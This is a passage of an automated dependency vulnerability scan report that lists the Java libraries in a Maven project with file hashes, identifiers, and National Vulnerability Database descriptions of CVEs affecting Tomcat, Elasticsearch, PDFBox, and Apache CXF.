The postinst script in the tomcat6 package before 6.0.45+dfsg-1~deb7u4 on Debian wheezy, before 6.0.35-1ubuntu3.9 on Ubuntu 12.04 LTS and on Ubuntu 14.04 LTS; the tomcat7 package before 7.0.28-4+deb7u8 on Debian wheezy, before 7.0.56-3+deb8u6 on Debian jessie, before 7.0.52-1ubuntu0.8 on Ubuntu 14.04 LTS, and on Ubuntu 12.04 LTS, 16.04 LTS, and 16.10; and the tomcat8 package before 8.0.14-1+deb8u5 on Debian jessie, before 8.0.32-1ubuntu1.3 on Ubuntu 16.04 LTS, before 8.0.37-1ubuntu0.1 on Ubuntu 16.10, and before 8.0.38-2ubuntu1 on Ubuntu 17.04 might allow local users with access to the tomcat account to obtain sensitive information or gain root privileges via a symlink attack on the Catalina localhost directory.

Vulnerable Software & Versions:

CVE-2016-9775  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The postrm script in the tomcat6 package before 6.0.45+dfsg-1~deb7u3 on Debian wheezy, before 6.0.45+dfsg-1~deb8u1 on Debian jessie, before 6.0.35-1ubuntu3.9 on Ubuntu 12.04 LTS and on Ubuntu 14.04 LTS; the tomcat7 package before 7.0.28-4+deb7u7 on Debian wheezy, before 7.0.56-3+deb8u6 on Debian jessie, before 7.0.52-1ubuntu0.8 on Ubuntu 14.04 LTS, and on Ubuntu 12.04 LTS, 16.04 LTS, and 16.10; and the tomcat8 package before 8.0.14-1+deb8u5 on Debian jessie, before 8.0.32-1ubuntu1.3 on Ubuntu 16.04 LTS, before 8.0.37-1ubuntu0.1 on Ubuntu 16.10, and before 8.0.38-2ubuntu1 on Ubuntu 17.04 might allow local users with access to the tomcat account to gain root privileges via a setgid program in the Catalina directory, as demonstrated by /etc/tomcat8/Catalina/attack.

Vulnerable Software & Versions:

CVE-2017-12615  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type

When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable Software & Versions:

CVE-2017-12616  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When using a VirtualDirContext with Apache Tomcat 7.0.0 to 7.0.80 it was possible to bypass security constraints and/or view the source code of JSPs for resources served by the VirtualDirContext using a specially crafted request.

Vulnerable Software & Versions:

CVE-2017-12617  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable Software & Versions:

CVE-2017-5647  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.

Vulnerable Software & Versions:

CVE-2017-5648  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
CWE: CWE-284 Improper Access Control

While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.

Vulnerable Software & Versions:

CVE-2017-5664  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

The error page mechanism of the Java Servlet Specification requires that, when an error occurs and an error page is configured for the error that occurred, the original request and response are forwarded to the error page. This means that the request is presented to the error page with the original HTTP method. If the error page is a static file, expected behaviour is to serve content of the file as if processing a GET request, regardless of the actual HTTP method. The Default Servlet in Apache Tomcat 9.0.0.M1 to 9.0.0.M20, 8.5.0 to 8.5.14, 8.0.0.RC1 to 8.0.43 and 7.0.0 to 7.0.77 did not do this. Depending on the original request this could lead to unexpected and undesirable results for static error pages including, if the DefaultServlet is configured to permit writes, the replacement or removal of the custom error page. Notes for other user provided error pages: (1) Unless explicitly coded otherwise, JSPs ignore the HTTP method. JSPs used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method. (2) By default, the response generated by a Servlet does depend on the HTTP method. Custom Servlets used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method.

Vulnerable Software & Versions:

CVE-2017-6056  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-19 Data Processing Errors

It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop. The denial of service is easily achievable as a consequence of backporting a CVE-2016-6816 fix but not backporting the fix for Tomcat bug 57544. Distributions affected by this backporting issue include Debian (before 7.0.56-3+deb8u8 and 8.0.14-1+deb8u7 in jessie) and Ubuntu.

Vulnerable Software & Versions:

CVE-2018-1304  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-254 7PK - Security Features

The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

Vulnerable Software & Versions:

CVE-2018-1305  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-284 Improper Access Control

Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

Vulnerable Software & Versions:

spatial4j-0.4.1.jar

Description:

Spatial4j is a general purpose spatial / geospatial ASL licensed open-source Java library. Its core capabilities are 3-fold: to provide common geospatially-aware shapes, to provide distance calculations and other math, and to read shapes in WKT format.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/spatial4j/spatial4j/0.4.1/spatial4j-0.4.1.jar
MD5: 7eafc2e18e82d7a38cb800be2dc9d678
SHA1: 4234d12b1ba4d4b539fb3e29edd948a99539d9eb
SHA256:c467b888bf475495a86a0f4491cb87f80f584e7646cafc7686489f81bce371bc
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.spatial4j:spatial4j:0.4.1  Confidence:Highest

lucene-spatial-4.10.4.jar

Description:

Spatial Strategies for Apache Lucene

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-spatial/4.10.4/lucene-spatial-4.10.4.jar
MD5: e78719c0845be3f2ffc0876ba3aefe57
SHA1: 79ac88a4f91125f47a1a8e28fffae9860e7b3ca6
SHA256:55a5721730d08671c94e80ffb4e1a50dbd2867ea2633aa734eab4166467518a4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-spatial:4.10.4  Confidence:Highest

antlr-runtime-3.5.jar

Description:

 A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.

File Path: /Users/Kevin/.m2/repository/org/antlr/antlr-runtime/3.5/antlr-runtime-3.5.jar
MD5: aa6d7c8b425df59f5f5bc98c58cfd9fc
SHA1: 0baa82bff19059401e90e1b90020beb9c96305d7
SHA256:7ef52a4e25ea2472a0ae62ae1d5ccaa7ef23be188289ad225fcb8a452a1b738d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.antlr:antlr-runtime:3.5  Confidence:Highest

elasticsearch-1.5.2.jar

Description:

 Elasticsearch - Open Source, Distributed, RESTful Search Engine

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/elasticsearch/elasticsearch/1.5.2/elasticsearch-1.5.2.jar
MD5: 44ad6d04a4e0697b4c26b819a1162bda
SHA1: 47aafc6bf8f23ed8dcbf6a1db174fb0b8e44a8db
SHA256:fb208793e8c77e2ad129df073b9382492fe2297492abbff1e2c50b96c4226053
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2015-4165  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The snapshot API in Elasticsearch before 1.6.0 when another application exists on the system that can read Lucene files and execute code from them, is accessible by the attacker, and the Java VM on which Elasticsearch is running can write to a location that the other application can read and execute from, allows remote authenticated users to write to and create arbitrary snapshot metadata files, and potentially execute arbitrary code.

Vulnerable Software & Versions:

CVE-2015-5531  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.

Vulnerable Software & Versions:

jempbox-1.8.11.jar

Description:

The Apache JempBox library is an open source Java tool that implements Adobe's XMP(TM) specification. JempBox is a subproject of Apache PDFBox.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/pdfbox/jempbox/1.8.11/jempbox-1.8.11.jar
MD5: ea59dc682cd3ed8ce8fb51e14e4693a4
SHA1: e4a930b874f4012314068550c70187e7857c4bd1
SHA256:b50879b87e1e9287831795d417af39d5587fcb2608b6296b7241fb0738aaaf6d
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2016-2175  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Apache PDFBox before 1.8.12 and 2.x before 2.0.1 does not properly initialize the XML parsers, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted PDF.

Vulnerable Software & Versions:

CVE-2018-8036  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

In Apache PDFBox 1.8.0 to 1.8.14 and 2.0.0RC1 to 2.0.10, a carefully crafted (or fuzzed) file can trigger an infinite loop which leads to an out of memory exception in Apache PDFBox's AFMParser.

Vulnerable Software & Versions:

xmlschema-core-2.2.1.jar

Description:

Commons XMLSchema is a light weight schema object model that can be used to manipulate or generate XML schema.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/ws/xmlschema/xmlschema-core/2.2.1/xmlschema-core-2.2.1.jar
MD5: bab3d98961f361b5e66dbcdadaad1ecf
SHA1: 02eff1f3776590d4c51cc735eab2143c497329f2
SHA256:a2c7a43319c213eea338ac0d84cc1aa1dc37cd458886d618703e8bd91bb51993
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.ws.xmlschema:xmlschema-core:2.2.1  Confidence:Highest
  • cpe: cpe:/a:ws_project:ws:2.2.1  Confidence:Low  

cxf-core-3.1.4.jar

Description:

 Apache CXF Core

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/cxf/cxf-core/3.1.4/cxf-core-3.1.4.jar
MD5: 7c2da0224027b70c6a06f96153b3b315
SHA1: 5387c3daecea4e2b4c7bf74c77e81435f381481e
SHA256:b9db76e21ca79793f9f016490ad4cf086148a716a0427e8d9806fb386e2c145b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.cxf:cxf-core:3.1.4  Confidence:Highest
  • cpe: cpe:/a:apache:cxf:3.1.4  Confidence:Highest  

CVE-2016-6812  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The HTTP transport module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 uses FormattedServiceListWriter to provide an HTML page which lists the names and absolute URL addresses of the available service endpoints. The module calculates the base URL using the current HttpServletRequest. The calculated base URL is used by FormattedServiceListWriter to build the service endpoint absolute URLs. If the unexpected matrix parameters have been injected into the request URL then these matrix parameters will find their way back to the client in the services list page which represents an XSS risk to the client.

Vulnerable Software & Versions:

CVE-2016-8739  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

The JAX-RS module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 provides a number of Atom JAX-RS MessageBodyReaders. These readers use Apache Abdera Parser which expands XML entities by default which represents a major XXE risk.

Vulnerable Software & Versions:

CVE-2017-12624  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-19 Data Processing Errors

Apache CXF supports sending and receiving attachments via either the JAX-WS or JAX-RS specifications. It is possible to craft a message attachment header that could lead to a Denial of Service (DoS) attack on a CXF web service provider. Both JAX-WS and JAX-RS services are vulnerable to this attack. From Apache CXF 3.2.1 and 3.1.14, message attachment headers that are greater than 300 characters will be rejected by default. This value is configurable via the property "attachment-max-header-size".

Vulnerable Software & Versions:

CVE-2017-3156  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-361 7PK - Time and State

The OAuth2 Hawk and JOSE MAC Validation code in Apache CXF prior to 3.0.13 and 3.1.x prior to 3.1.10 is not using a constant time MAC signature comparison algorithm which may be exploited by sophisticated timing attacks.

Vulnerable Software & Versions:

CVE-2017-5653  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-20 Improper Input Validation

JAX-RS XML Security streaming clients in Apache CXF before 3.1.11 and 3.0.13 do not validate that the service response was signed or encrypted, which allows remote attackers to spoof servers.

Vulnerable Software & Versions:

CVE-2017-5656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-384 Session Fixation

Apache CXF's STSClient before 3.1.11 and 3.0.13 uses a flawed way of caching tokens that are associated with delegation tokens, which means that an attacker could craft a token which would return an identifier corresponding to a cached token for another user.

Vulnerable Software & Versions:

CVE-2018-8039  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-254 7PK - Security Features

It is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty("java.protocol.handler.pkgs", "com.sun.net.ssl.internal.www.protocol");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.

Vulnerable Software & Versions:

jboss-jaxrs-api_2.0_spec-1.0.1.Beta1.jar

Description:

 JSR 339: JAX-RS 2.0: The Java(TM) API for RESTful Web Services

License:

Common Development and Distribution License: http://repository.jboss.org/licenses/cddl.txt
GNU General Public License, Version 2 with the Classpath Exception: http://repository.jboss.org/licenses/gpl-2.0-ce.txt
File Path: /Users/Kevin/.m2/repository/org/jboss/spec/javax/ws/rs/jboss-jaxrs-api_2.0_spec/1.0.1.Beta1/jboss-jaxrs-api_2.0_spec-1.0.1.Beta1.jar
MD5: b9eaf10c4d4f47c49ee13e7f8db54f0f
SHA1: 66c0832acaba167c2fd7ee4cbaf212347854d57c
SHA256:1218fa20acae20a0cfb618b452e01c9bf2bfa9cb12fadb308a7a3adbdc45d2b5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.spec.javax.ws.rs:jboss-jaxrs-api_2.0_spec:1.0.1.Beta1  Confidence:Highest

resteasy-jaxrs-services-3.1.1.Final.jar

File Path: /Users/Kevin/.m2/repository/org/jboss/resteasy/resteasy-jaxrs-services/3.1.1.Final/resteasy-jaxrs-services-3.1.1.Final.jar
MD5: 1119eeca48ad4b20f335875c1ae46632
SHA1: 9137bc3f670d573438ec51eb74e9944790001741
SHA256:7da742585f0c4fd539c93abc1a5d42ab36a7203f4984b83b7ae594c34b30e9d6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.resteasy:resteasy-jaxrs-services:3.1.1.Final  Confidence:Highest

jboss-annotations-api_1.2_spec-1.0.0.Final.jar

Description:

 JSR 250: Common Annotations for the Java(TM) Platform

License:

CDDL or GPLv2 with exceptions: https://glassfish.dev.java.net/public/CDDL+GPL_1_1.html
File Path: /Users/Kevin/.m2/repository/org/jboss/spec/javax/annotation/jboss-annotations-api_1.2_spec/1.0.0.Final/jboss-annotations-api_1.2_spec-1.0.0.Final.jar
MD5: 5f6032592ce12619333ee3330cdebf08
SHA1: 6d7ff02a645227876ed550900d32d618b8f0d556
SHA256:bb979cac95ef2748bc85d4b8151bef88b9a203d03068fbe799c6e6162c950780
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.spec.javax.annotation:jboss-annotations-api_1.2_spec:1.0.0.Final  Confidence:Highest

activation-1.1.1.jar

Description:

 The JavaBeans(TM) Activation Framework is used by the JavaMail(TM) API to manage MIME data

License:

COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html
File Path: /Users/Kevin/.m2/repository/javax/activation/activation/1.1.1/activation-1.1.1.jar
MD5: 46a37512971d8eca81c3fcf245bf07d2
SHA1: 485de3a253e23f645037828c07f1d7f1af40763a
SHA256:ae475120e9fcd99b4b00b38329bd61cdc5eb754eee03fe66c01f50e137724f99
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.activation:activation:1.1.1  Confidence:Highest

jcip-annotations-1.0.jar

File Path: /Users/Kevin/.m2/repository/net/jcip/jcip-annotations/1.0/jcip-annotations-1.0.jar
MD5: 9d5272954896c5a5d234f66b7372b17a
SHA1: afba4942caaeaf46aab0b976afd57cc7c181467e
SHA256:be5805392060c71474bf6c9a67a099471274d30b83eef84bfc4e0889a4f1dcc0
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.jcip:jcip-annotations:1.0  Confidence:Highest

jboss-logging-3.3.0.Final.jar

Description:

 The JBoss Logging Framework

License:

Apache License, version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/jboss/logging/jboss-logging/3.3.0.Final/jboss-logging-3.3.0.Final.jar
MD5: bc11af4b8ce7138cdc79b7ba8561638c
SHA1: 3616bb87707910296e2c195dc016287080bba5af
SHA256:e0e0595e7f70c464609095aef9e47a8484e05f2f621c0aa5081c18e3db2d498c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.logging:jboss-logging:3.3.0.Final  Confidence:Highest

resteasy-jaxrs-3.1.1.Final.jar

File Path: /Users/Kevin/.m2/repository/org/jboss/resteasy/resteasy-jaxrs/3.1.1.Final/resteasy-jaxrs-3.1.1.Final.jar
MD5: 34f453ada08efeabbc2f83b3dae14f7f
SHA1: 8c2d93394dbb42b418be4579a49460883b3d3aef
SHA256:dde3dff1cab60d94cbc7db62683991ffbfb07188c4c7c6397e79975ccbc1033a
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.resteasy:resteasy-jaxrs:3.1.1.Final  Confidence:Highest

jna-4.0.0.jar: jnidispatch.dll

File Path: /Users/Kevin/.m2/repository/net/java/dev/jna/jna/4.0.0/jna-4.0.0.jar/com/sun/jna/win32-x86/jnidispatch.dll
MD5: cc120b15f4fcdafe80c495c5c648319f
SHA1: 75aad2852aab97bf068c71c10e60b1c96bcadc1c
SHA256:aac8facb9f50ef401a610eb40232f324ae8cc59671c48298742bf0fec3b8967f
Referenced In Project/Scope:trial:compile

Identifiers

  • None

jna-4.0.0.jar: jnidispatch.dll

File Path: /Users/Kevin/.m2/repository/net/java/dev/jna/jna/4.0.0/jna-4.0.0.jar/com/sun/jna/w32ce-arm/jnidispatch.dll
MD5: 57697cbdd321ae7d06f5da04e821f908
SHA1: 67167f2b2fce8db5f9f64a372b0da54730d3ee51
SHA256:361e173e6e50cb1bf8b7fab38c1ff99686ea819e58ee30348e7756cb0418a9f6
Referenced In Project/Scope:trial:compile

Identifiers

  • None

jna-4.0.0.jar: jnidispatch.dll

File Path: /Users/Kevin/.m2/repository/net/java/dev/jna/jna/4.0.0/jna-4.0.0.jar/com/sun/jna/win32-x86-64/jnidispatch.dll
MD5: 06b2f1f909d2436dff20d7a668ef26a9
SHA1: bd1bdda9a91f3b0d9067e323f7394bef933f81f6
SHA256:e7864cb5509990ccf3f3d8a2ad1eaf41491ebb82df35408ee79957385d8355b3
Referenced In Project/Scope:trial:compile

Identifiers

  • None

jansi-1.11.jar: jansi.dll

File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/native/windows32/jansi.dll
MD5: 1e56641bb68937f8e2020cbff5d04a08
SHA1: 97f6e12599bb5848867b9762184d055ed918ab2a
SHA256:0f59ff32a7c70e00a580d893de42ffaf48d0242b4d6251792666919b10ac3cd4
Referenced In Project/Scope:trial:compile

Identifiers

  • None

jansi-1.11.jar: jansi.dll

File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/native/windows64/jansi.dll
MD5: fd3a20891286c958103f3ea07174cd3c
SHA1: 829195c9e338d5725cf304ae33fc209db53884eb
SHA256:c33505a7c1fb847c03329a4f0e4b3c5cebac3a3604133d797d09172de25e3978
Referenced In Project/Scope:trial:compile

Identifiers

  • None

plexus-utils-1.5.4.jar (shaded: org.codehaus.plexus:plexus-interpolation:1.0)

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-utils/1.5.4/plexus-utils-1.5.4.jar/META-INF/maven/org.codehaus.plexus/plexus-interpolation/pom.xml
MD5: 61795135733295c9aa438fda7b923db8
SHA1: 1074eabfbcbfb0decfe6f9ed0541668e114b9311
SHA256:0749c012cf2271d466eb9aef9acc2e84c38a2a94d545e7108fd15302b21a1b82
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-interpolation:1.0  Confidence:High

netty-common-4.1.8.Final.jar (shaded: org.jctools:jctools-core:1.2.1)

Description:

 Java Concurrency Tools Core Library

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/io/netty/netty-common/4.1.8.Final/netty-common-4.1.8.Final.jar/META-INF/maven/org.jctools/jctools-core/pom.xml
MD5: b104e807eab8c5ec728e4440814b4e86
SHA1: 890d905133422e4be5df7cffa81e7dd9c5336d7e
SHA256:12444dc7be1ea1e1b5361f4bb9fb9ae04197b64846c3ce915b363cfafbcdf8d9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jctools:jctools-core:1.2.1  Confidence:High

jansi-1.11.jar (shaded: org.fusesource.hawtjni:hawtjni-runtime:1.8)

Description:

 The API that projects using HawtJNI should build against.

File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/maven/org.fusesource.hawtjni/hawtjni-runtime/pom.xml
MD5: 9343dc158b5894310f26732ebb2b73ee
SHA1: 14df4655274e472909050661f8e9ed98a28b6721
SHA256:13ecedc2275242731df0cb4b491cb79cacb36f945ff402677b56680d7321a15f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.fusesource.hawtjni:hawtjni-runtime:1.8  Confidence:High

jansi-1.11.jar (shaded: org.fusesource.jansi:jansi-native:1.5)

Description:

 Jansi is a java library for generating and interpreting ANSI escape sequences.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/maven/org.fusesource.jansi/jansi-native/pom.xml
MD5: 1bbb551ce034727cd799619954437ab5
SHA1: 0177ae5fbf3b24c3e9adb94d98e29213259a8bc6
SHA256:e6fd759cbf831b6df571733eb38cfbee690d52c2e205248a76690efd24c8e036
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:id:id-software:1.5  Confidence:Low  
  • maven: org.fusesource.jansi:jansi-native:1.5  Confidence:High

jansi-1.11.jar (shaded: org.fusesource.jansi:jansi:1.11)

Description:

 Jansi is a java library for generating and interpreting ANSI escape sequences.

File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/maven/org.fusesource.jansi/jansi/pom.xml
MD5: 18c6eba91ac7aa1a27324b482dca06d5
SHA1: 3aea48c5e47064eec9903f4a14e5acee8fe345d8
SHA256:fba16891bde4264829c63dcddbed8832b14537caeb25d10a90ee0fba934a552d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.fusesource.jansi:jansi:1.11  Confidence:High
  • cpe: cpe:/a:id:id-software:1.11  Confidence:Low  

htrace-core-3.2.0-incubating.jar (shaded: commons-logging:commons-logging:1.1.1)

Description:

Commons Logging is a thin adapter allowing configurable bridging to other, well known logging systems.

File Path: /Users/Kevin/.m2/repository/org/apache/htrace/htrace-core/3.2.0-incubating/htrace-core-3.2.0-incubating.jar/META-INF/maven/commons-logging/commons-logging/pom.xml
MD5: 976d812430b8246deeaf2ea54610f263
SHA1: 76672afb562b9e903674ad3a544cdf2092f1faa3
SHA256:d0f2e16d054e8bb97add9ca26525eb2346f692809fcd2a28787da8ceb3c35ee8
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-logging:commons-logging:1.1.1  Confidence:High


This report contains data retrieved from the National Vulnerability Database.
This report may contain data retrieved from the Node Security Platform.